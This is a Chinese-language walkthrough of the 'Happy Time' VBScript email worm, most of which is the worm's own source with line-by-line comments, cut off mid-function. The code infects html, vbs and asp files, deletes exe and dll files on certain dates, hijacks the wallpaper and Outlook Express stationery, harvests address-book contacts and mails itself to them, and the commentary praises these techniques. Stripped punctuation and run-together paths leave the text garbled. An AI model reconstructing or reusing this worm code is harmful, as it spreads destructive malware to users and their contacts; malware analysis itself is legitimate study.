歡樂時(shí)光代碼分析

1、 PAGE PAGE 34“歡樂時(shí)光”其實(shí)就是利用了超文本郵件中可以夾帶腳本語言的特點(diǎn)而棋高一招的。我們知道，郵件的格式可以有兩種：純文本和超文本。超文本（HTML）功能強(qiáng)大就不用多說了，它可以內(nèi)嵌數(shù)種腳本語言，常見的就是VBScript和JavaScript?！皻g樂時(shí)光”在超文本中夾帶的就是VBS。從源代碼中可以看得出來，該作者很可能是長期從事網(wǎng)絡(luò)編程的高手，他對(duì)VBS的認(rèn)識(shí)可謂精通，使用的許多技術(shù)細(xì)節(jié)都鮮為人知，尤其是利用了類型庫（TypeLibrary）成功地避開了安全審核的手段更是令人嘆為觀止。下面讓我們來看看它藏在快樂的外衣下的是什么吧！*歡樂時(shí)光*RemIamsorry!happy

2、timeOnErrorResumeNextMload以上為病毒入口，并加上Iamsorry!happytime的注釋，以表明此文件已被感染過。Submload()OnErrorResumeNextmPath=Grf()SetOs=CreateObject(Scriptlet.TypeLib)SetOh=CreateObject(Shell.Application)建立枚舉對(duì)象，避開了安全審核IfIsHTMLThen調(diào)用IsHtml函數(shù)，如果是Html，就小寫mURL=LCase(document.Location)IfmPath=ThenOs.ResetOs.Path=C:Help.htmOs

3、.Doc=Lhtml()Os.Write()如果mPath為空，就在C盤下生成Help.htmIhtml=超文本的內(nèi)容，并指向C:Help.HtmCalldocument.Body.insertAdjacentHTML(AfterBegin，Ihtml)ElseIfIv(mPath，Help.vbs)ThensetIntervalRt()，10000Elsem=htaIfLCase(m)=Right(mURL，Len(m)Thenid=setTimeout(mclose()，1)設(shè)置超時(shí)條件mainElseOs.Reset()Os.Path=mPath&Help.htaOs.Doc=Lhtml

4、()Os.write()IvmPath，Help.hta生成Help.htaEndIfEndIfEndIfElseMain都不是，就執(zhí)行main函數(shù)EndIfEndSub*以下為主函數(shù)，太長了！Submain()OnErrorResumeNextSetOf=CreateObject(Scripting.FileSystemObject)不用說，創(chuàng)建FileSystemObject對(duì)象啦SetOd=CreateObject(Scripting.Dictionary)創(chuàng)建Dictionary對(duì)象，用來保存數(shù)據(jù)鍵和項(xiàng)目對(duì)，它實(shí)際上是一個(gè)比較開放的數(shù)組Od.Addhtml，1100Od.Addvbs，

5、0100Od.Addhtm，1100Od.Addasp，0010向Dictionary對(duì)象添加要感染的項(xiàng)目對(duì)Ks=HKEY_CURRENT_USERSoftware使用變量以減少代碼長度Ds=Grf()Cs=Gsf()IfIsVbsThen如果是VBSIfOf.FileExists(C:help.htm)ThenOf.DeleteFile(C:help.htm)如果c:help.htm存在，就刪掉，消滅遺留的痕跡EndIfKey=CInt(Month(Date)+Day(Date)IfKey=13Then如果月與日之和為13（這也是它變種多的原因?qū)?3改為其他數(shù)字即可）Od.RemoveAll

6、Od.Addexe，0001Od.Adddll，0001就清空Dictionary數(shù)組，并將exe、dll加入Dictionary對(duì)象，以備刪除之用EndIfCn=Rg(Ks&HelpCount)讀注冊表中的HKEY_CURRENT_USERSoftwareHelpCount鍵值IfCn=ThenCn=1如果Count為0，就設(shè)為1EndIfRwKs&HelpCount，Cn+1添加HKEY_CURRENT_USERSoftwareHelpCount鍵值，值為2f1=Rg(Ks&HelpFileName)再讀HKEY_CURRENT_USERSoftwareHelpFileName鍵值f2=F

7、Next(Of，Od，f1)得到該文件的文件名fext=GetExt(Of，Od，f2)得到該文件擴(kuò)展名的代號(hào)RwKs&HelpFileName，f2添加鍵值IfIsDel(fext)Then如果擴(kuò)展名代號(hào)的第四個(gè)字符為1即0001(exe、dll)f3=f2儲(chǔ)存文件名f2=FNext(Of，Od，f2)得到文件的文件名？RwKs&HelpFileName，f2寫注冊表Of.DeleteFilef3刪除文件ElseIfLCase(WScript.ScriptFullname)LCase(f2)Then如果不是集合中的文件FwOf，f2，fextEndIfEndIfIf(CInt(Cn)Mod3

8、66)=0ThenIf(CInt(Second(Time)Mod2)=0Then使用Cint函數(shù)強(qiáng)制執(zhí)行轉(zhuǎn)換，并發(fā)郵件TsendElseadds=OgMsend(adds)EndIfEndIfwp=Rg(HKEY_CURRENT_USERControlPaneldesktopwallPaper)IfRg(Ks&HelpwallPaper)wpOrwp=Then比較桌面墻紙是否已改變Ifwp=Thenn1=n3=Cs&Help.htmElsemP=Of.GetFile(wp).ParentFoldern1=Of.GetFileName(wp)n2=Of.GetBaseName(wp)n3=Cs&

9、n2&.htmEndIfSetpfc=Of.CreateTextFile(n3，True)mt=Sa(1100)創(chuàng)建超文本pfc.Write&mt超文本的內(nèi)容pfc.CloseRwKs&HelpwallPaper，n3RwHKEY_CURRENT_USERControlPaneldesktopwallPaper，n3將帶毒的超文本設(shè)置成活動(dòng)桌面EndIfElseSetfc=Of.CreateTextFile(Ds&Help.vbs，True)fc.WriteSa(0100)創(chuàng)建vbs文件fc.Closebf=Cs&Untitled.htmSetfc2=Of.CreateTextFile(bf，

10、True)fc2.WriteLhtmlfc2.Close創(chuàng)建windows下的untitled.htmoeid=Rg(HKEY_CURRENT_USERIdentitiesDefaultUserID)oe=HKEY_CURRENT_USERIdentities&oeid&SoftwareMicrosoftOutlookExpress5.0MailMSH=oe&MessageSendHTMLCUS=oe&ComposeUseStationerySN=oe&StationeryNameRwMSH，1RwCUS，1RwSN，bf在Hkey_Current_UserIdentitiesAECF6CA3

11、-9614-4AF4-AEF2-CT63FE9D97A4SoftwareMicrosoftOutlookExpress5.0Mail下添加三個(gè)鍵值MessageSendHTML、ComposeUseStationery和StationeryName，前兩個(gè)的值為1，后一個(gè)指向windowsuntitled.htmWeb=Cs&WEBSetgf=Of.GetFolder(Web).Files得到windowsweb文件夾里的文件Od.Addhtt，1100向Dictionary里添加htt項(xiàng)目對(duì)ForEachmIngf遍歷windowsweb下的每一個(gè)文件fext=GetExt(Of，Od，m)

12、得到每個(gè)文件的擴(kuò)展名IffextThen如果擴(kuò)展名不為空，則FwOf，m，fextEndIfNextEndIfEndSub*Submclose()document.WriteIamsorry!寫入Iamsorry，并關(guān)閉。以此作為感染與否的標(biāo)記window.CloseEndSub*SubFw(Of，S，n)此時(shí)S為文件名，n為文件擴(kuò)展名Dimfc，fc2，m，mmail，mtOnErrorResumeNextSetfc=Of.OpenTextFile(S，1)只讀模式打開該文件mt=fc.ReadAll讀入全部文件流fc.Close關(guān)閉文件IfNotSc(mt)Then如果未感染過mmail=

13、Ml(mt)mt=Sa(n)Setfc2=Of.OpenTextFile(S，8)打開文件并在文件末尾進(jìn)行寫愛作fc2.Writemtfc2.CloseMsend(mmail)發(fā)帶毒郵件EndIfEndSub*FunctionSc(S)mN=RemIamsorry!happytimeIfInStr(S，mN)0Then如果讀入的文件流中有RemIamsorry!happytimeSc=TrueElseSc=False表示已感染過，返回True，否則為FalseEndIfEndFunction*FunctionFNext(Of，Od，S)Dimfpath，fname，fext，T，gfOnErr

14、orResumeNextfname=T=False初始化變量IfOf.FileExists(S)Then如果S存在于當(dāng)前文件夾中fpath=Of.GetFile(S).ParentFolder得到文件的父目錄名fname=S得到文件名ElseIfOf.FolderExists(S)Then不存在于當(dāng)前文件夾中，則得到目錄名fpath=ST=TrueElsefpath=Dnext(Of，)得到當(dāng)前盤符即根目錄EndIfDoWhileTrueSetgf=Of.GetFolder(fpath).Files得到當(dāng)前目錄下的所有文件對(duì)象ForEachmIngf遍歷每個(gè)文件IfTThenIfGetExt(

15、Of，Od，m)Then如果該文件是文件集合中的一員FNext=m則返回該文件名，供調(diào)用的函數(shù)或過程使用感染或刪除之ExitFunctionEndIfElseIfLCase(m)=LCase(fname)Orfname=Then如果沒文件T=TrueEndIfNextfpath=Pnext(Of，fpath)LoopEndFunction*FunctionPnext(Of，S)OnErrorResumeNextDimPpath，Npath，gp，pn，T，mT=FalseIfOf.FolderExists(S)Then如果如果指定的文件夾存在Setgp=Of.GetFolder(S).SubF

16、olders就得到子目錄數(shù)pn=gp.CountIfpn=0Then如果沒子目錄Ppath=LCase(S)Npath=LCase(Of.GetParentFolderName(S)得到父目錄的小寫形式T=TrueElseNpath=LCase(S)有子目錄，得到其小寫形式的集合EndIfDoWhileNotErForEachpnInOf.GetFolder(Npath).SubFolders得到子目錄下的子目錄IfTThenIfPpath=LCase(pn)ThenT=FalseEndIfElsePnext=LCase(pn)ExitFunctionEndIfNextT=TruePpath=

17、LCase(Npath)將字符串轉(zhuǎn)化成小寫Npath=Of.GetParentFolderName(Npath)IfOf.GetFolder(Ppath).IsRootFolderThen如果是根目錄m=Of.GetDriveName(Ppath)就得到分區(qū)符Pnext=Dnext(Of，m)ExitFunctionEndIfLoopEndIfEndFunction*FunctionDnext(Of，S)Dimdc，n，d，T，mOnErrorResumeNextT=Falsem=Setdc=Of.Drives得到所有的驅(qū)動(dòng)器盤符ForEachdIndc遍歷每個(gè)驅(qū)動(dòng)器Ifd.DriveType

18、=2Ord.DriveType=3Then如果是網(wǎng)絡(luò)盤或本地盤IfTThenDnext=dExitFunction如果是False，就返回當(dāng)前盤，并退出本函數(shù)ElseIfLCase(S)=LCase(d)Then如果是True且盤符相同，就令T為TrueT=TrueEndIfIfm=Then如果m為空，就將盤符付給mm=dEndIfEndIfEndIfNextDnext=m返回盤符EndFunction*FunctionGetExt(Of，Od，S)DimfextOnErrorResumeNextfext=LCase(Of.GetExtensionName(S)返回該文件擴(kuò)展名的小寫GetEx

19、t=Od.Item(fext)返回Dictionary對(duì)象中指定的key對(duì)應(yīng)的item即0001(exe)等EndFunction*SubRw(k，v)寫注冊表DimROnErrorResumeNextSetR=CreateObject(WScript.Shell)創(chuàng)建對(duì)象R.RegWritek，vEndSub*FunctionRg(v)讀注冊表DimROnErrorResumeNextSetR=CreateObject(WScript.Shell)創(chuàng)建對(duì)象Rg=R.RegRead(v)EndFunction*FunctionIsVbs()此函數(shù)判斷是不是VBS文件DimErrTestOnEr

20、rorResumeNextErrTest=WScript.ScriptFullnameIfErrThen如果出錯(cuò)，則不是VBSIsVbs=FalseElseIsVbs=TrueEndIfEndFunction*FunctionIsHTML()此函數(shù)判斷是不是Html文件DimErrTestOnErrorResumeNextErrTest=document.LocationIfErThenIsHTML=False如果出錯(cuò)，則不是超文本ElseIsHTML=TrueEndIfEndFunction*FunctionIsMail(S)此函數(shù)判斷是不是郵件地址Dimm1，m2IsMail=FalseI

21、fInStr(S，vbCrLf)=0Then返回vbCrLf在S中第一次出現(xiàn)的位置，vbCrLf是換行符m1=InStr(S，)m2=InStr(S，.)Ifm10Andm1m2Then如果有“”符號(hào)且“”在“.之前，則是郵件地址IsMail=TrueEndIfEndIfEndFunction*FunctionGsf()得到windows目錄DimOf，mOnErrorResumeNextSetOf=CreateObject(Scripting.FileSystemObject)創(chuàng)建FileSystemObject對(duì)象m=Of.GetSpecialFolder(0)得到特殊目錄Windows、

22、System和Temp目錄IfErThen如果失敗，返回C:Gsf=C:Else若正常，則返回%Windows%Gsf=mEndIfEndFunction*FunctionLhtml()寫入超文本的內(nèi)容，其中vbCrLf是換行符Lhtml=Help&Lscript(Lvbs()&vbCrLf&_EndFunction*FunctionLscript(S)寫入vbscript的聲明Lscript=&vbCrLf&_S&EndFunction*FunctionSl(S1，S2，n)Diml1，l2，l3，il1=Len(S1)得到文件流的長度l2=Len(S2)得到mailto:的長度i=InSt

23、r(S1，S2)在文件流中查找mailto:第一次出現(xiàn)的位置值為一個(gè)數(shù)Ifi0Then找到則進(jìn)行字符串愛作l3=i+l2-1Ifn=0ThenSl=Left(S1，i-1)ElseIfn=1ThenSl=Right(S1，l1-l3)EndIfElseSl=EndIfEndFunction*FunctionOg()得到WAB（通訊簿）中的郵件地址Dimi，n，m()，Om，OoSetOo=CreateObject(Outlook.Application)創(chuàng)建Outlook應(yīng)用程序?qū)ο?，Outlook和OutlookExpress都跑不掉啦！SetOm=Oo.GetNamespace(MAPI)

24、.GetDefaultFolder(10).Itemsn=Om.CountReDimm(n)Fori=1Tonm(i-1)=Om.Item(i).Email1Address得到每個(gè)WAB中的郵件地址NextOg=mEndFunction*SubTsend()發(fā)帶毒郵件DimOd，MS，MM，a，mSetOd=CreateObject(Scripting.Dictionary)MConnectMS，MMMM.FetchSorted=TrueMM.FetchFori=0ToMM.MsgCount-1MM.MsgIndex=ia=MM.MsgOrigAddressIfOd.Item(a)=ThenO

25、d.Item(a)=MM.MsgSubjectEndIfNextForEachmInOd.KeysMM.ComposeMM.MsgSubject=Fw:&Od.Item(m)設(shè)置郵件標(biāo)題MM.RecipAddress=m此郵件的當(dāng)前的目標(biāo)郵件地址MM.AttachmentPathName=Gsf&Untitled.htm添加附件WindowsUntitled.htmMM.Send發(fā)送！NextMS.SignOffEndSub*FunctionEr()設(shè)置的錯(cuò)誤陷阱，避免程序崩潰，嚴(yán)謹(jǐn)?shù)娘L(fēng)格值得學(xué)習(xí)IfErr.Number=0ThenEr=FalseElseErr.ClearEr=TrueEndIfEndFunction*Funct